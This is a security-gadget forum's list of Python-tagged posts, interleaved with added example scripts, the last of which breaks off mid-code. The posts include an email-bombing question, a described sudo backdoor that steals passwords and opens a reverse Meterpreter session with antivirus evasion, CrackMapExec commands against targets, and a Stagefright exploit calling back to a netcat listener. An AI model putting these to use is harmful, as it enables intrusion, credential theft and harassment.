Search the Community

Showing results for tags 'python'.

  1. Hello community, nice to be here. I just wondered: is there a more effective way of email bombing than what I am currently doing? I have a simple home-made Python script which allows me to connect to a Google account I create (basic, I know). I am trying to work on other email provider support. But anyway... I can't get past the "text only input"; is there a way to send files in email bomb attacks? Also, how would this be done, and is there a way to get past the terminal cutting out due to the server closing the connection? Is this due to the email service closing due to the volume of emails? If so, is there a way I could logically delay the time between messages? Lastly, all my emails come through to the same email. How can I get it to create a new email (conversation) for each email? Would it be a simple character variable changed on each send? How would I implement this?
  2. I need some help in writing some code to automate some of my jobs and I can't figure out an efficient way to just get the wireless card and Ethernet MAC addresses. I'm trying to use something similar to this:
     ips = subprocess.check_output(["WMIC", "NICCONFIG", "where", "IPEnabled=true", "get", "IPAddress"], universal_newlines=True).strip().split("\n\n")[1:]
  3. I want to build a USB Rubber Ducky simulator using Python. How can I simulate keyboard presses in Python? Can someone point me in the right direction please? In an ideal world I would love to develop a suite of tools that can be accessed from a GUI to configure/test and monitor Hak5 gear, but sadly this may be beyond my capabilities :-(
  4. Taking the idea (again, mad props to sudoBackdoor) a bit further with some Python scripting, I scared myself (and unintentionally pwned myself a few times as well) with this thing.
     How it works:
     - The user's .bash_profile or .bashrc gets tweaked to point to ~/.config/sudo
     - A Python script called sudo is installed there. [Patience is required here, as you need to wait for the user to sudo some command now]
     - This will take their password, validate it by running its own sudo command (literally just echoing something) and seeing if it works
     - Once it confirms a good password, it stores the password for later retrieval and executes the intended sudo command in a subshell that the user shouldn't even notice a difference in
     - After executing their command, it will use the password to sudo open up a reverse HTTPS Meterpreter session on the machine. It will do this every time sudo is run.
     I unintentionally self-pwned a few times, because the Meterpreter session is being run as root, and one must sudo kill to get rid of it. Sudo killing it will get rid of the existing session as expected, but then will open up a shiny new session as its last step (unless the Python script is gone). Because antivirus tends to recognize the base64-encoded Meterpreter payload as malicious, I also wrote a script called "shellSmuggler.py" to go with it. If you use the msfvenom command I supply here, you should be able to pipe the output to the shellSmuggler and scramble the payload enough that antivirus doesn't alert on/block it anymore. You will need to know your listening machine's IP and listening port (obviously).
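An added example for the question above (written for this page, not the poster's script): instead of splitting WMIC's plain-text output on blank lines, ask `wmic` for CSV and parse it with the csv module. The sample output below is constructed to match the usual shape of `wmic nic ... /format:csv` (leading blank line, a Node column, CRLF endings); the wireless/wired split is a name-based heuristic, not something WMI reports directly. Only `run_wmic` needs Windows; the parser runs anywhere.

```python
"""Pull adapter name + MAC from `wmic nic ... /format:csv` output.

Added example, not the poster's script. It assumes the Windows `wmic`
binary is available (only needed by run_wmic); the parser itself is
exercised here on a constructed sample so it runs anywhere.
"""
import csv
import io
import re
import subprocess

# Constructed sample of what
#   wmic nic where "NetEnabled=true" get Name,MACAddress /format:csv
# typically returns: a leading blank line, a CSV header that starts with
# Node, and CRLF line endings.
SAMPLE_WMIC_CSV = (
    "\r\n"
    "Node,MACAddress,Name\r\n"
    "DESKTOP-TEST,00:11:22:33:44:55,Intel(R) Ethernet Connection I219-LM\r\n"
    "DESKTOP-TEST,AA:BB:CC:DD:EE:FF,Intel(R) Wireless-AC 9260\r\n"
)

MAC_RE = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$", re.I)


def parse_wmic_csv(text):
    """Return {adapter name: MAC} for rows that carry a well-formed MAC."""
    # wmic prefixes the CSV with a blank line and may emit stray \r; drop both
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    reader = csv.DictReader(io.StringIO("\n".join(lines)))
    result = {}
    for row in reader:
        mac = (row.get("MACAddress") or "").strip()
        name = (row.get("Name") or "").strip()
        if name and MAC_RE.match(mac):
            result[name] = mac.upper()
    return result


def classify(adapters):
    """Split adapters into wireless / wired by adapter name (heuristic assumption)."""
    wireless = {n: m for n, m in adapters.items()
                if re.search(r"wireless|wi-?fi|802\.11", n, re.I)}
    wired = {n: m for n, m in adapters.items() if n not in wireless}
    return wireless, wired


def run_wmic():
    """Run the real command on Windows and parse it (requires wmic on PATH)."""
    out = subprocess.check_output(
        ["wmic", "nic", "where", "NetEnabled=true",
         "get", "Name,MACAddress", "/format:csv"],
        universal_newlines=True,
    )
    return parse_wmic_csv(out)


if __name__ == "__main__":
    # offline demo on the constructed sample
    wireless, wired = classify(parse_wmic_csv(SAMPLE_WMIC_CSV))
    print("wireless:", wireless)
    print("wired:   ", wired)
```

Filtering on `NetEnabled=true` drops disabled and virtual adapters that carry no MAC; the regex check guards against the empty MACAddress field WMI returns for some tunnel adapters.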
  5. I decided to put together a payload to get myself familiar with the bunny. This was inspired by SudoBackdoor and borrows heavily from it, but uses python because I'm more fluent in that than bash. I'm hoping to have this thing completed by the end of this week or possibly the weekend. The code under development is on my github at https://github.com/michael-weinstein/bashbunny-payloads/tree/darkCharlie/payloads/library/credentials/darkCharlie
  6. I was going to make some mods to the QUACK Python code. I'm an old Perl guy so decided to use the REPEAT command as a guide to the Python syntax and style. After a lot of hair pulling, I discovered that the REPEAT command does not work in the first place, so my mods based on REPEAT don't either. The Python QUACK code attempts to save previous line state in the "context" list variable (actually an immutable tuple), but it also appears to re-initialize it to empty for every new line, eliminating any state for REPEAT to ever act on. I'm not really a Python guy, so I guess my first question is: does REPEAT work on the 1.3 firmware?
  7. WhiteDNS
     WhiteDNS is something I've been working on for a few days now. It's basically a small DNS server that only serves domains it knows/has listed. A whitelisting DNS server, hence WhiteDNS. Link to the Github repo is here. Instead of explaining everything it can do, I'll just provide examples of queries to this DNS server. The main documentation is in the Python script itself and there is a bit on the Github.
     If I query "test" using nslookup..
     [ SERVER SIDE ]
     # test isn't in ROUTES therefore only responds with a preset IP
     if query not in ROUTES then return 127.0.0.1
     [ CLIENT SIDE ]
     QUERY: nslookup test 127.0.0.1   # Assuming server is hosted on local PC
     OUTPUT:
     Non-authoritative answer:
     Server: test
     Addresses: 127.0.0.1
     If I give "test" a corresponding IP then query "test" using nslookup..
     [ SERVER SIDE ]
     # test is in ROUTES therefore responds with corresponding IP
     test. -> 192.168.1.10
     if query not in ROUTES then return 127.0.0.1
     if query is in ROUTES then return query's set IP (192.168.1.10)
     [ CLIENT SIDE ]
     QUERY: nslookup test 127.0.0.1   # Assuming server is hosted on local PC
     OUTPUT:
     Non-authoritative answer:
     Server: test
     Addresses: 192.168.1.10
     What if the querier is under a company domain or some other domain? Won't it come up with this super long domain name that the server can't recognise? Well, yes, you are correct. However, you are also not.. Example: if I query "test" and my PC is under the domain "company.local", this is what happens:
     [ SERVER SIDE ]
     # test is in ROUTES therefore responds with corresponding IP
     test -> 192.168.1.10   # notice how I removed the '.' here as well
     string = first bit of query (test.company.local.)
     if string not in ROUTES then return 127.0.0.1
     if string is in ROUTES then return query's set IP (192.168.1.10)
     [ CLIENT SIDE ]
     QUERY: nslookup test 127.0.0.1   # Assuming server is hosted on local PC
     OUTPUT:
     Non-authoritative answer:
     Server: test.company.local
     Addresses: 192.168.1.10
     This server can potentially be made into a payload and served on the Bunny for all your DNS pentesting needs. That was my end goal and now that I've done the hard part I figured I would release this as a Python server and let others create payloads on it. Because it is a whitelisting server you can set the primary DNS server on a PC to the Bunny (which is hosting the server) and block any phone-homes made by the PC, allowing you to basically ignore the rest of the network's hostnames. Or you could collect them all or change them all to go through the Bunny instead.. or reset all the hostnames to go to a specific IP (does that already, really..). Possibilities are as far as a DNS server goes! :P I hope this helps someone achieve their DNS pentesting dreams or even helps you understand how a DNS server works. Keep in mind though, this is a very simple DNS server and only responds with generic answers. It can't handle ridiculously complex DNS queries - not that many internal queries require that.
  8. TLDR: https://github.com/ThoughtfulDev/PyDuckGen
     Hey, since the Simple-Ducky Payload Generator is discontinued, I think, I just wanted to create an easy way to generate existing payloads and move the needed files to the Rubber Ducky. PyDuck is a Python script which helps you to get your once-written USB Rubber Ducky payloads onto your Duck's SD card quickly. You can even change variable components by using a simple set <attribute> <val> command. All of this is made easy with a Metasploit-like interface. Simply choose your payload with use <payload>, configure it and there you go :)
     Have a look into the bundled modules in the module folder to understand the attributes, but here is a quick explanation. Your duckscript is:
     ...
     STRING <replacable_text>
     ...
     In your module.json just add your attribute to the attributes tree like this:
     "attributes": {
         "replacable_text": "The default value"
     }
     If you now load your payload with 'use <your_payload>' you can use the following:
     set replacable_text Hak5 is awesome :)
     If you then generate the inject.bin using gen or generate, the <replacable_text> will be replaced with Hak5 is awesome. Isn't that...awesome? :D
     You can even add folders/files to your module.json which are needed for your payload (have a look at the mimikatz_lazagne payloads to see how this works.) I really suggest that you have a look at the existing payloads to figure out how this works :D More information can be found on the Github repo: https://github.com/ThoughtfulDev/PyDuckGen Let me know what you think.
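The resolver rule described in post 7 (answer 127.0.0.1 unless the first label of the query is whitelisted, whatever search domain the client appended), as an added example written for this page rather than the WhiteDNS code from the poster's repository. The ROUTES table and fallback address are taken from the post; the packet encoding is hand-rolled with the standard library so it runs offline, and `build_query` exists only so the response path can be exercised without a network.

```python
"""Minimal whitelisting DNS resolver in the spirit of WhiteDNS.

Added example written for this page, not the WhiteDNS code from the
poster's repository. ROUTES, the 127.0.0.1 fallback and the
"first label only" rule follow the post; the packet building is
hand-rolled with struct so it runs with the standard library.
"""
import socket
import struct

ROUTES = {"test": "192.168.1.10"}   # whitelist, as in the post
DEFAULT_IP = "127.0.0.1"            # answer for anything not whitelisted


def parse_qname(data, offset=12):
    """Read the dotted name from a DNS question section; return (name, end offset)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:  # compression pointers do not occur in a plain query
            raise ValueError("compressed name in question")
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def resolve(qname):
    """Apply the WhiteDNS rule: match on the first label, ignore the search domain."""
    first = qname.rstrip(".").split(".")[0].lower()
    return ROUTES.get(first, DEFAULT_IP)


def build_response(query):
    """Build an A-record answer for the (single) question in `query`."""
    txid = query[:2]
    qname, qend = parse_qname(query)
    qtype, _qclass = struct.unpack("!HH", query[qend:qend + 4])
    question = query[12:qend + 4]
    if qtype != 1:
        # not an A query: reply with an empty answer section rather than lie
        return txid + struct.pack("!HHHHH", 0x8180, 1, 0, 0, 0) + question
    ip = resolve(qname)
    # flags 0x8180: QR=1, RD=1, RA=1; one question, one answer
    header = txid + struct.pack("!HHHHH", 0x8180, 1, 1, 0, 0)
    # name as a pointer to offset 12, type A, class IN, TTL 60 s, rdlength 4
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + socket.inet_aton(ip)
    return header + question + answer


def build_query(name, txid=0x1234):
    """Offline test helper: encode a standard recursion-desired A query for `name`."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)


def answered_ip(response):
    """Pull the IPv4 address out of a single-answer response (last 4 bytes)."""
    return socket.inet_ntoa(response[-4:])


def serve(bind=("0.0.0.0", 53)):
    """Run the server; port 53 needs root or CAP_NET_BIND_SERVICE."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    while True:
        data, addr = sock.recvfrom(512)
        try:
            sock.sendto(build_response(data), addr)
        except (ValueError, IndexError, struct.error):
            pass  # malformed query: drop it rather than crash the loop


if __name__ == "__main__":
    serve()
```

Because only the first label is compared, `test`, `test.company.local` and `test.` all map to the same entry, which is the behaviour the post shows with nslookup; the cost is that two different hosts whose names share a first label are indistinguishable, so keep the whitelist keys unique on that label.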
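Posts 6 and 8 both describe a pass over a Ducky Script before it is encoded: filling `<attribute>` placeholders from a module's "attributes" map (PyDuckGen) and expanding `REPEAT n` into n copies of the previous command (which, per post 6, needs state carried across lines rather than a context reset per line). The following is an added example written for this page, not the Bash Bunny QUACK code or PyDuckGen; the placeholder syntax and attribute mapping follow post 8, and the sample payload and the choice to let a placeholder hold a REPEAT count are assumptions for illustration.

```python
"""Pre-process a Ducky Script: fill <attribute> placeholders and expand REPEAT.

Added example for this page, not the Bash Bunny QUACK code or PyDuckGen.
The previous emitted line is kept as state across lines, which is what
REPEAT needs; resetting it per line (post 6) leaves REPEAT nothing to act on.
"""
import re

PLACEHOLDER = re.compile(r"<([A-Za-z_][A-Za-z0-9_]*)>")


def substitute(script, attributes):
    """Replace every <name> that has a value in `attributes`; leave unknown ones alone."""
    def repl(match):
        return str(attributes.get(match.group(1), match.group(0)))
    return PLACEHOLDER.sub(repl, script)


def expand_repeat(script):
    """Expand `REPEAT n` into n copies of the previous command line.

    Raises ValueError when REPEAT has nothing to repeat or a bad count.
    """
    out = []
    previous = None  # carried across lines on purpose; never reset per line
    for lineno, raw in enumerate(script.splitlines(), 1):
        parts = raw.strip().split(None, 1)
        if not parts or parts[0] == "REM":
            out.append(raw)  # blank lines and comments pass through, state unchanged
            continue
        if parts[0] == "REPEAT":
            if previous is None:
                raise ValueError(f"line {lineno}: REPEAT with no previous command")
            try:
                count = int(parts[1])
            except (IndexError, ValueError):
                raise ValueError(f"line {lineno}: REPEAT needs a positive integer") from None
            if count < 1:
                raise ValueError(f"line {lineno}: REPEAT needs a positive integer")
            out.extend([previous] * count)
            continue  # REPEAT itself does not become the new "previous"
        out.append(raw)
        previous = raw
    return "\n".join(out)


def preprocess(script, attributes):
    """Substitute first, then expand, so a placeholder may also hold a REPEAT count."""
    return expand_repeat(substitute(script, attributes))


# Constructed sample payload using both features (not from either project)
SAMPLE = """REM open the run box and type the configured text
GUI r
DELAY 500
STRING <replacable_text>
ENTER
DOWNARROW
REPEAT <presses>
"""
ATTRS = {"replacable_text": "Hak5 is awesome", "presses": 3}

if __name__ == "__main__":
    print(preprocess(SAMPLE, ATTRS))
```

Running the sample yields `STRING Hak5 is awesome` and four `DOWNARROW` lines (the original plus three repeats); the encoder then sees only plain commands, which is the point of doing this before `inject.bin` is generated.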
  9. I'm stuck while working on a prank payload. While the target computer is locked or logged off, I'm trying to find a way or see if it's even possible to copy a single file from the BB onto the target computer either into multiple Users folders or searching for a specific named file and replacing them with the file on the BB. Since the target computer would be locked or logged out, using the command prompt or powershell scripts is out of the question. I'm thinking that anything done would have to be solely done on the BB side, setup as say the SMB_Exfil payload only in reverse with the BB setting up as an SMB server, copy the file from the BB to an SMB temp folder, pulling the targets IP, and either copying the file over to the target computer or searching for a file name within the target computer from the IP address and replacing it with file. I'm just thinking out loud since I'd started working on this and using a CMD script to do the job (which works so far, but I'm still testing it), but wanted to see if it was possible to remove the CMD script for this to be accomplished without needing to be logged into the computer. If it takes learning python to write a script for the BB to be able to do this I'll do it, but I'd rather ask if anyone else thinks or knows it would be possible. Any thoughts?
  10. Hey all, I've got a problem with my python server. The Bash Bunny doesn't want to handle it forever, so it seems to stop handling after about 5 seconds (or shutting it down, can't tell which). The exact same code works locally on my computer (python script that runs a simple SocketServer), and it runs forever (using httpd.serve_forever()), however the BB doesn't want to run it forever. Any ideas why the BB stops handling? EDIT: Just for those that are interested, the browser error says "Site cannot be reached; connection was reset (ERR_CONNECTION_RESET)".
  11. Hello, do you guys know if it's possible to capture client-to-WiFi-router probe requests, just like Karma does, but without "answering" any of those requests, using Python? I mean, to passively monitor surrounding devices' probes and log them to a text file or something, but be invisible in their WiFi network list. Any Python library suggestions would be appreciated!
  12. Once I deploy the LAN Turtle, SSH into it using my own VPS, is it possible to run my own custom python scripts using the LAN turtle terminal. For example: I write my own python keylogger script and SCP it onto my LAN Turtle. Is there a way to run this? I'm unsure if this will work as this is connected via ethernet, not necessarily a normal USB stick. Thanks for your time.
  13. CrackMapExec is a fantastic tool developed by byt3bl33d3r and can be found here: https://github.com/byt3bl33d3r/CrackMapExec
      As stated in the repo's README, it's powered by Impacket and takes cues and inspiration from several other tools targeting SMB, WMI, and Windows in general. I recommend reading up on it if you are unfamiliar. For now, it's worth mentioning that CrackMapExec (CME) is also a Python library that can be installed with pip and used like a standard tool, i.e. you can type "crackmapexec" and use it without needing a Python script to act as a vehicle. I installed it on the Bunny and have used it for some network-based attacks using RNDIS_ETHERNET mode. If you'd like to do the same, I encourage you to install pip. Connect to the Bunny via SSH and use curl with the "insecure" and output file options, like so:
      cd /pentest
      curl -k -O https://bootstrap.pypa.io/get-pip.py
      Now check your Bunny's current system date and time. If it's not current then you need to update it or Python and SSL will throw a fit because the date/time is wrong. Then use Python to run the script:
      python get-pip.py
      That may take some time to complete, but pip will open up a lot of possibilities and assist with Python tools and dependencies. Once that's done, you'll need to install packages required for supporting OpenSSL/PyOpenSSL. You'll need to have shared your internet connection with the Bunny for this to work.
      apt-get install build-essential libssl-dev libffi-dev python-dev
      Once those packages have been installed successfully, you should now be able to successfully use pip to install CME. If something goes wrong with this next step, it's almost certainly related to the cryptography library and a missing dependency. Read the error carefully and Google it. You can be certain there will be several GitHub and StackOverflow hits at the top. Run pip:
      pip install crackmapexec
      Once that is done, you can test everything by just running "crackmapexec" in your terminal and you should see CME spit out its help text and version information. You're now ready to include CME commands in your Bunny payloads. CME is a network attack tool, so you can use it against locked PCs. A very basic example of this is:
      crackmapexec $TARGET_IP
      That command tells CME to connect to the target's IP address via SMB. If that much can be done, CME will return a hostname and the target's operating system build. This is a fast "attack" and can be used to, let's say, fingerprint a machine quickly to prove you had access and collect some information. You can go a step further with this:
      crackmapexec $TARGET_IP -u "" -p ""
      That tells CME to try a null session with SMB. If the target disallows null sessions nothing bad happens. You still get the basic OS details. If the target allows for a null session to be initiated then you can check for success and then potentially proceed with something like running CME again with the addition of "--shares" to enumerate network shares and gather additional information. If you happen to have a password hash or credentials from an earlier attack (perhaps phishing or passed to you from a teammate), those creds can be used with CME and any CME-based payload can be easily edited to include the credentials for a much wider variety of attacks.
  14. Hello everyone! I'm currently trying to make the script "fakeAP" work on my Pineapple. This script simply creates a fake AP; I'll let you imagine what for. The problem is: this script requires Scapy to work. I tried to install it but when I run the setup script, it says that it can't find "distutils.core". Distutils is used to install Python packages. I searched for a way to install it but, when I try to install it (via opkg or from source), it says:
      * pkg_write_filelist: Failed to open //usr/lib/opkg/info/python-distutils.list: No space left on device.
      * opkg_install_pkg: Failed to extract data files for python-distutils. Package debris may remain!
      * opkg_install_cmd: Cannot install package python.
      * opkg_conf_write_status_files: Can't open status file //usr/lib/opkg/status: No space left on device.
      So, my Pineapple doesn't have enough space left. I tried to tweak opkg.conf so it can install it on my SD card (mounted on /sd) but it fails every time. I deleted a bunch of my modules and temp files, but the result is the same. Does anyone have a solution? Thanks and sorry for bad English! :)
  15. Hi, as a starter project for messing around with Tk, I made a replacement for the wp6.sh script with a GUI. It's a bit basic to say the least, but it should be functional. I'm aware that I should really be using classes to build my application, but this is just an excuse to code something. Hopefully, someone might find this useful. Anyway, the code (such as it is) is located here: https://github.com/phpsystems/PineappleSetupGui Phpsystems.
  16. Hi, I've been crunching away at this python3 script(s) for the past month and I would like some input on how to make it better. I based this bot off of Paul Mutton's work from the book “IRC Hacks.” Threading, having less hard coded variables, self healing, and making this code less dyslexic is definitely on the to do list! Let me know what you think :3 https://github.com/notpike/PikeBot
  17. Hi all, I was looking at trying wifite2 on the TETRA, mainly for the 5 GHz addition over the standard wifite, which works reasonably well. It seemed to require stty, so I installed coreutils-stty and that got me a little further, so it runs and finds networks. But as soon as you specify a target it hits an issue with:
      WPA-handshake attack: waiting for handshake...
      [!] Error: global name 'err' is not defined
      [!] Full stack trace below
      [!] Traceback (most recent call last):
      [!]   File "./Wifite.py", line 171, in <module>
      [!]     w.main()
      [!]   File "./Wifite.py", line 34, in main
      [!]     self.run()
      [!]   File "./Wifite.py", line 120, in run
      [!]     attack.run()
      [!]   File "/root/wifite2-master/py/AttackWPA.py", line 80, in run
      [!]     if handshake.has_handshake():
      [!]   File "/root/wifite2-master/py/Handshake.py", line 61, in has_handshake
      [!]     if len(self.tshark_handshakes()) > 0:
      [!]   File "/root/wifite2-master/py/Handshake.py", line 127, in tshark_handshakes
      [!]     if not Process.exists('tshark'):
      [!]   File "/root/wifite2-master/py/Process.py", line 51, in exists
      [!]     if stdout == '' and err == '':
      [!] NameError: global name 'err' is not defined
      At first I thought this was to do with STDOUT & STDERR so I looked at libdaemon from opkg but that doesn't seem to make a difference. Did anyone already try wifite2 and if so did you get any further? Would love to hear from you. Cheers all
  18. Looking to install some python modules for a project. pip is not there. Tried a workaround that seemed have failed. So what are my options? And can I get a list of python modules available for the Turtle ahead of time? (to avoid wasting time)
  19. Hello there guys! Nice to see you! Just wanted to know about the power of Python from you leets; I'm a beginner, trying to learn new things in Python. Can you please tell me what things can be done with Python? Can I use Python for IoT devices? Is it going to help me only in scripting?
  20. Hello there! Which is the best programming language to start with? I have already learned a bit of C and JAVA. May I know the best language to start with? I want to learn to make wireless hacking tools for linux with my own coding knowledge, kindly help! Thanks!
  21. I have a bit of an odd question that I'm hoping someone here can point me in the right direction to figure out. I have been looking at a DVR which I purchased for the express purpose of poking around on. I was able to gain access to it via telnet, and found some interesting things. I found the password hashes for the web portal. The passwords themselves are hashed using an algorithm detected by JTR as "dahua". Outside of the source code for the JTR module located at http://fossies.org/linux/john/src/dahua_fmt_plug.c I cannot find any information about how this algorithm works. I spent several hours using my google-fu, but I haven't found anything yet. Here is what I have so far from reading the source code from above: The password is hashed using MD5, then compressed using the compress method included above. I don't know C well enough to be able to translate the rest of it, but that seems to be 99% of the work. I am getting hashes in the correct format using the code posted below, but they aren't correct. The code from the JTR module expects a 16 character hash, but MD5 returns a 32 character hash. I am quite rusty on C/C++, but I'm having a really hard time understanding the flow of the C program of the JTR module, particularly with pointers, and memory allocations. I know my python file has some errors in it, because it wasn't until I started writing this that I realized it was only checking the first 16 characters of the hash, not the full 32. It doesn't matter because the compressor as written only reduces the length by 2 anyway. dahua_hash.py
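The scheme in the JtR source the post links (dahua_fmt_plug.c) is: MD5 the password, then fold the 16 raw digest bytes pairwise, each pair summed modulo 62 and mapped onto 0-9, A-Z, a-z, giving an 8-character hash. The "16 characters" in that source are the 16 digest bytes, not 16 hex characters, which is where a Python port that works on `hexdigest()` goes wrong. Below is an added example written for this page, not the poster's dahua_hash.py; it is checked against the widely documented hash of the default password "admin", 6QNMIQGe. The `crack` helper is an assumption about how one would use it.

```python
"""Dahua web-portal password hash, reimplemented from JtR's dahua_fmt_plug.c.

Added example, not the poster's dahua_hash.py. Algorithm: MD5 the password,
then fold the 16 raw digest bytes pairwise (sum mod 62) into 8 characters
from the set 0-9, A-Z, a-z. Note: raw digest bytes, not the hex string.
"""
import hashlib


def _to_charset(v):
    """Map 0..61 onto '0'-'9', 'A'-'Z', 'a'-'z' exactly as the C compressor does."""
    if v < 10:
        return chr(v + 48)   # '0'..'9'
    if v < 36:
        return chr(v + 55)   # 'A'..'Z'
    return chr(v + 61)       # 'a'..'z'


def compress(digest):
    """Fold a 16-byte MD5 digest into the 8-character Dahua hash."""
    if len(digest) != 16:
        raise ValueError("expected the 16 raw MD5 digest bytes, not the hex string")
    return "".join(_to_charset((digest[i] + digest[i + 1]) % 62)
                   for i in range(0, 16, 2))


def dahua_hash(password):
    """Hash a password the way the device stores it."""
    return compress(hashlib.md5(password.encode("latin-1")).digest())


def crack(target, wordlist):
    """Try each candidate; return the first match or None (assumed usage helper)."""
    for word in wordlist:
        if dahua_hash(word) == target:
            return word
    return None


if __name__ == "__main__":
    # default password "admin" -> 6QNMIQGe
    print(dahua_hash("admin"))
```

Two things follow from the construction: the output space is at most 62^8, and every pair of digest bytes is reduced mod 62, so many distinct passwords collide on the same 8 characters. That is why a fast MD5 plus this fold is a weak storage format, and why JtR treats it as a cheap hash type.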
  22. Hi guys, I've been working on a Python script to help organize the Pineapple's SSID pool. Most of the work I do with the Pineapple has to do with attracting unassociated clients. As such it's sometimes undesirable to have an extremely large SSID pool. For instance, if I'm trying to grab a client and it's looking for an SSID that's 2250 on the list, but the Pineapple is rolling through SSIDs at number 5 on the list, I might miss my opportunity. To help combat this, I generally use an SSID list that is smaller in number, but the SSIDs on that list are SSIDs that many people use (e.g. attwifi, panera, CableWifi). Up until now I've just been looking at multiple lists trying to pick out ones I think clients will be broadcasting.
      The script makes use of the Pineapple's pineap.log file. You can find this file by going to the Logging system module and clicking the Download button after you've used PineAP to log some probe requests. You can also find it on the Pineapple in the /tmp/ directory. This file starts anew after each restart. If you place pineap.log in the same directory as the script and run the script, the script will:
      - harvest all of the SSIDs and the MAC addresses that probed for them
      - eliminate all duplicate requests
      - assign each SSID a rank based on the number of times a unique device requested that SSID
      - sort the SSID with the highest rank to the top with each successive rank behind
      - write the results to two files. The first file, SSIDlist.log, has just SSIDs listed in their appropriate rank order. The second file, finalRanking.log, has the same but each SSID has its rank next to it.
      What I then do is edit SSIDlist.log, erase all but the top 100 SSIDs, rename the file to ssid_file, and place it in the Pineapple's /etc/pineapple/ directory. (More on that here: https://forums.hak5.org/index.php?/topic/38060-ssid-pool-management/?p=275753) Now my standard pool of SSIDs is the top 100 SSIDs used in my part of the world.
      Just to give you an example of how I'm using this on the ground. Yesterday I took my Pineapple to a large target area. I needed to know what SSIDs would most likely ensnare the devices and the employees' personal devices on that campus. I spent over an hour walking the grounds and ended up with over 450 SSIDs. Using this script, I'll cut that 450 down to 100 or even 50 to increase the speed and efficiency of grabbing a client. The example files that are with the script are from me driving around Tampa yesterday with the Pineapple in the back of my car. Just for the record, war driving is a terrible way to collect probe requests for an area. You're better off walking.
      You might be asking, why isn't this a module? First, I've never used JavaScript or PHP. I'm attempting to learn, but I'm not even close. So if anyone finds this helpful enough and wants to make it a module, be my guest. Finally, I'd like to make a suggestion. If you use this script for a particular area and you don't mind sharing, I would like to make a repository of Top 100s for regions all over the world. I have webspace at skinnyrd.com and can post them all there in an organized fashion. The more distinct the region, like neighborhoods or industrial parks in cities vs entire metro areas, the better. If you live in a small town, that's welcome too. If you'd really rather not share, no big deal. If you have any questions just let me know. Have a great day! SSIDsort.zip
  23. Hi, my name is GoldraK. We have created a compiler for the USB Rubber Ducky written in Python that can be used as an application to compile or as a Python class for other projects. Fixed the keyboard in Spanish; it had several failures with \ / and some more characters. The encoder is based on [Encoder] Duck Encoder V2.6.3 Released 01/12/14. You can download it from the GitHub project https://github.com/securipy/USB-Rubber-Ducky Any problems that you find or suggestions, do not hesitate to say so. Happy Cuack
  24. If you have a cool Python library that you use, post it here.
  25. Hi guys, after the discovery of the Stagefright bug, the researchers at Zimperium have posted a Python script for the specific module CVE-1538. I downloaded it and tried to execute it on my Android phone with Lollipop 5.0. Before this, I downloaded the Zimperium APK to test if my phone is vulnerable. The app shows me, in green, the module CVE-1538 and others... After this, on my Linux PC with Python 2.7.x, I renamed the script to mp4.py to resolve an import error. Then I tried to generate the file.mp4 with this command:
      $ python2 mp4.py -c [LAN IP] -p 4444
      The script correctly generates a file.mp4 without an error. Then I launched a listener with:
      $ netcat -l -p 4444
      I sent the file.mp4 to my smartphone and tried to execute it. The terminal with netcat doesn't show anything, no result, nisba, nada... I tried with the Metasploit multi/handler listener but with the same result. Any solution? Thanks everyone and sorry for my English ;-P
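Posts 11 and 22 meet in one piece of logic: pull (source MAC, SSID) pairs out of probe request frames without ever transmitting, then rank SSIDs by how many distinct devices asked for them. The following is an added example written for this page, not the poster's SSIDsort script (which reads pineap.log rather than frames) and not a capture tool. The frames are constructed in memory; on a real box you would feed raw 802.11 frames from a monitor-mode socket or a pcap, and capture itself is outside this example. The ranking rule (unique probing MACs per SSID, most popular first) and the two output files follow post 22.

```python
"""Parse 802.11 probe requests and rank SSIDs by number of distinct probing devices.

Added example for this page, not the poster's SSIDsort script and not a
capture tool. Frames are constructed below; a real feed would come from a
monitor-mode socket or a pcap. Nothing here transmits, so this is the
passive side of what post 11 asks about.
"""
from collections import defaultdict


def build_probe_request(src_mac, ssid):
    """Constructed test frame: management type 0, subtype 4, no radiotap header."""
    fc = b"\x40\x00"          # version 0, type 0 (mgmt), subtype 4 (probe request)
    duration = b"\x00\x00"
    bcast = b"\xff" * 6
    sa = bytes.fromhex(src_mac.replace(":", ""))
    seq = b"\x00\x00"
    ssid_ie = b"\x00" + bytes([len(ssid)]) + ssid.encode()
    rates_ie = b"\x01\x04\x02\x04\x0b\x16"   # supported rates, just a second IE
    return fc + duration + bcast + sa + bcast + seq + ssid_ie + rates_ie


def parse_probe_request(frame):
    """Return (source MAC, SSID) for a probe request, or None for any other frame."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    if ftype != 0 or subtype != 4:
        return None
    src = ":".join(f"{b:02x}" for b in frame[10:16])   # addr2 = transmitter
    off = 24  # tagged parameters follow the 24-byte management header
    while off + 2 <= len(frame):
        tag, length = frame[off], frame[off + 1]
        body = frame[off + 2: off + 2 + length]
        if len(body) != length:
            return None                       # truncated IE
        if tag == 0:
            # empty SSID = wildcard probe; returned as "" so callers can skip it
            return src, body.decode("utf-8", "replace")
        off += 2 + length
    return None


def rank_ssids(frames):
    """Count unique probing devices per SSID; return [(ssid, count)] best first."""
    seen = defaultdict(set)
    for frame in frames:
        parsed = parse_probe_request(frame)
        if parsed is None:
            continue
        src, ssid = parsed
        if ssid:                              # ignore wildcard probes
            seen[ssid].add(src)               # a set, so repeats never count twice
    return sorted(((s, len(m)) for s, m in seen.items()), key=lambda t: (-t[1], t[0]))


def write_lists(ranked, top=100, ssid_path="SSIDlist.log", rank_path="finalRanking.log"):
    """Write the two files post 22 describes, keeping only the top N."""
    with open(ssid_path, "w") as f:
        f.write("\n".join(s for s, _ in ranked[:top]) + "\n")
    with open(rank_path, "w") as f:
        f.write("\n".join(f"{s} {c}" for s, c in ranked[:top]) + "\n")


# Constructed traffic: three devices probe attwifi (one twice), two probe CableWifi
SAMPLE_FRAMES = [
    build_probe_request("02:00:00:00:00:01", "attwifi"),
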